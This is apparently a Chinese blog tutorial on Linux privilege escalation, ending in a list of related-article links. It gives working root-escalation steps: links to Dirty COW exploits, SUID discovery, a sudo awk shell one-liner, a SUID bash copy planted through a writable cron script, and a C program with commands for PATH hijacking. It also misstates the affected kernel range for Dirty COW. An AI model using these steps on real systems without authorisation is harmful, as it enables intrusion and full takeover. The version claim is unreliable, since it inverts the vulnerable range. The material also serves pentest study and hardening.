0x00 内核漏洞

00 Dirty COW（cve-2016-5195）

原理：脏牛漏洞cve-2016-5195又叫Dirty COW，Linux内核的内存子系统在处理写入时复制(copy-on-write, COW)时产生了竞争条件 (race condition)。恶意用户可利用此漏洞，来获取高权限，对只读内存映射进行写访问。竞争条件，指的是任务执行顺序异常，可导致应用崩溃，或令攻击者有机可乘，进一步执行其他代码。

利用条件：Linux内核 <= 2.6.22

exp1：Firefart/Dirtycow： Dirty Cow 漏洞利用 - CVE-2016-5195 (github.com)

exp2： gbonacini/CVE-2016-5195：CVE-2016-5195漏洞利用示例。 (github.com)

0x01 脚本扫描

00 linux-exploit-suggester

探测系统可能存在的漏洞（存在误报）

脚本地址：mzet-/linux-exploit-suggester: Linux privilege escalation auditing tool (github.com)

01 linux-exploit-suggester2

同上一个脚本的优化版本（需要perl环境运行）

脚本地址：jondonas/linux-exploit-suggester-2: Next-Generation Linux Kernel Exploit Suggester (github.com)

0x02 SUID提权

百度百科：SUID权限是一种特殊权限，设置了suid的程序文件，在用户执行该程序时，用户的权限是该程序文件属主的权限。如果可以找到并运行root用户所拥有的SUID的文件，那么就可以在运行该文件的时候获得root用户权限。

00 linux命令查找SUID文件

#不同系统命令会有不同
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

-perm：匹配特殊权限 -4000表示SUID,-u=s即为查找权限为suid; -print： find命令将匹配的文件输出到标准输出 -type f类型为文件

-exec： find命令对匹配的文件执行该参数所给出的shell命令，相应的形式为：-exec command {} \;其中分号代表终止符，\是为了有时候需要转义分号，{}代表find出来的文件

ls命令： -l是使用较长格式列出信息 -d是显示目录而非内容

一般Linux可用提权文件：nmap、vim、find、bash、more、less、cp

SUID提权命令查询网站：走开垃圾箱 (gtfobins.github.io)

01 利用步骤

以find命令为例子

1、查找SUID文件

2、进行find命令提权

0x03 sudo提权

00 简介

sudo是linux系统管理指令，是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具，如halt，reboot，su等等。换句话说通过此命令可以让非root的用户运行只有root才有权限执行的命令。

01 sudo的特性

1、sudo的配置文件是sudoers文件，它允许系统管理员集中的管理用户的使用权限和使用的主机。它所存放的位置默认是在/etc/sudoers，属性必须为0440。

2、sudo能够限制用户只在某台主机上运行某些命令。

3、sudo提供了丰富的日志，详细地记录了每个用户干了什么。它能够将日志传到中心主机或者日志服务器。

02 利用步骤

1、查询可以进行sudo免密的命令（以awk命令作为例子）

sudo -l

2、利用awk命令进行提权

sudo awk 'BEGIN {system("/bin/sh")}'

0x04 计划任务提权

00 简介

系统内可能会有一些定时执行的任务，一般这些任务由crontab来管理，具有所属用户的权限。非root权限的用户是不可以列出root用户的计划任务的。但是/etc/内系统的计划任务可以被列出。

tips：由于权限配置不当，导致我们可以成功修改cron中的任何脚本或二进制文件，那么我们可以使用root权限执行任意代码。

利用命令如下命令列出一些计划任务

ls -l /etc/cron*
cat /etc/crontab

01 利用

1、查看test.sh文件，发现为所有人都可读可写

2、添加内容到test.sh文件中

cp /bin/bash /tmp/shell
chmod u+s /tmp/shell

3、等待计划任务被执行

4、执行shell文件，提权成功

0x05 本地环境变量提权

00 简介

执行ps会打印进程信息，执行 /tmp/ps，相当于执行bash，得到新的终端，环境变量劫持ps 就是以system 执行了bash，所以获取了root权限。

01 利用

1、编写.c文件

//demo.c#include<unistd.h>
void main()
{
setuid(0);
setgid(0);
system("ps");
}

2、编译以及执行.c文件

gcc demo.c -o shell
chmod u+s shell
cp /bin/bash /tmp/ps
export PATH=/tmp:$PATH        #加入环境变量
./shell

linux提权参考方法相关推荐

linux 提权方法总结
几点前提已经拿到低权shell 被入侵的机器上面有nc,python,perl等linux非常常见的工具有权限上传文件和下载文件内核漏洞提权提到脏牛,运维流下两行眼泪,我们留下两行鼻血.内核漏 ...
Linux提权方法总结
目录内核漏洞提权 SUID提权计划任务提权 sudo滥用提权配置错误之利用/etc/passwd提权当我们拿到了一台Linux服务器的低权限账号,于是,我们想要通过技术手段提权至root用户权 ...
linux 提权一文通
目录 0x001 linux提权描述 0x002 基本Linux权限提升前的信息收集操作系统什么是发行类型?什么版本的? 什么是内核版本?是64位吗? 从环境变量中可以收集到什么信息?环境变量中可 ...
Metasploit上使用RPC方式复现一个Linux提权漏洞
序学习了几天pwn的栈溢出知识后,收到了期待已久的任务--在metasploit上使用RPC的方式复现一个Linux提权漏洞,学长说这是一个偏向探索性质的,为了督促自己和提高效率,利用这种方式记录下 ...
ATTCK权限提升-Linux提权总结
ATT&CK权限提升-Linux提权总结介绍 MITRE ATT&CK ®是一个全球可访问的基于真实世界观察的对手战术和技术知识库,本文根据MITRE ATT&CK框架总 ...
Linux提权，吃透这篇文章就够了
0x001 linux提权描述大多数计算机系统设计为可与多个用户一起使用.特权是指允许用户执行的操作.普通特权包括查看和编辑文件或修改系统文件.特权升级意味着用户获得他们无权获得的特权.这些特权可用 ...
Linux提权思路+实战【很不错的文章】
Linux提权思路前言首先关于Linux提权我们得先明白几个概念. linux发行版本是我们常说的Linux操作系统,也即是由Linux内核与各种常用软件的集合产品,全球大约有数百款的Linux ...
一文吃透Linux提权
Python实战社群 Java实战社群长按识别下方二维码,按需求添加扫码关注添加客服进Python社群▲ 扫码关注添加客服进Java社群▲ 文章作者:dnsill 文章来源:https://s ...
（建议收藏）万字长文，带你一文吃透 Linux 提权
前言关于Linux知识,博主已经整理成专栏,感兴趣的小伙伴可自行订阅专栏 Linux疑难杂症解决指南你的支持就是我不断更新的动力! 0x001 linux提权描述大多数计算机系统设计为可与多个用 ...

linux提权参考方法

0x00 内核漏洞

00 Dirty COW（cve-2016-5195）

0x01 脚本扫描

00 linux-exploit-suggester

01 linux-exploit-suggester2

0x02 SUID提权

00 linux命令查找SUID文件

01 利用步骤

0x03 sudo提权

00 简介

01 sudo的特性

02 利用步骤

0x04 计划任务提权

00 简介

01 利用

0x05 本地环境变量提权

00 简介

01 利用

linux提权参考方法相关推荐

最新文章

热门文章